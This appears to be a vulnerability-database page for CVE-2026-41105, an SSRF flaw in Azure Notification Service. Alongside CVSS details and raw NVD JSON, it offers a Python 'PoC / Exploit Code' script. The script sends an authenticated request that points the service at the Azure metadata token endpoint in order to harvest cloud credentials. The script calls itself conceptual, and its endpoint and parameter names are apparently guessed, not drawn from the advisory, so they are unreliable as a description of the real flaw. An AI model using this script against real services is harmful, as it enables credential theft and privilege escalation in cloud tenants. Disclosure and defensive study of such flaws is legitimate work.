Security Vulnerability Report
中文
CVE-2026-41105 CVSS 8.1 HIGH

CVE-2026-41105

Published: 2026-05-07 22:16:35
Last Modified: 2026-05-08 15:47:30

Description

Server-side request forgery (ssrf) in Azure Notification Service allows an authorized attacker to elevate privileges over a network.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Azure Notification Service (具体版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-41105: Azure Notification Service SSRF # This script demonstrates a conceptual SSRF attack. def trigger_ssrf(target_endpoint, internal_url): """ Sends a malicious request to the target service to force it to visit an internal URL. """ headers = { "Content-Type": "application/json", "Authorization": "Bearer <VALID_TOKEN>" # PR:L requires valid auth } # Payload simulating a notification callback to an internal resource payload = { "notification_url": internal_url, "message": "Test" } try: print(f"[*] Attempting to send request to {target_endpoint}...") response = requests.post(target_endpoint, json=payload, headers=headers, timeout=5) if response.status_code == 200: print("[+] Request sent successfully. Check if internal resource was accessed.") print(f"Response: {response.text[:200]}") else: print(f"[-] Server returned status code: {response.status_code}") print(f"Response: {response.text}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Target URL (Placeholder) TARGET = "https://<azure-notification-service-endpoint>/api/v1/notify" # Internal URL to access (e.g., Azure Instance Metadata Service) # Accessing this may retrieve IAM credentials, leading to Privilege Escalation INTERNAL_PAYLOAD = "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" trigger_ssrf(TARGET, INTERNAL_PAYLOAD)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41105", "sourceIdentifier": "[email protected]", "published": "2026-05-07T22:16:35.183", "lastModified": "2026-05-08T15:47:29.690", "vulnStatus": "Awaiting Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Server-side request forgery (ssrf) in Azure Notification Service allows an authorized attacker to elevate privileges over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41105", "source": "[email protected]"}]}}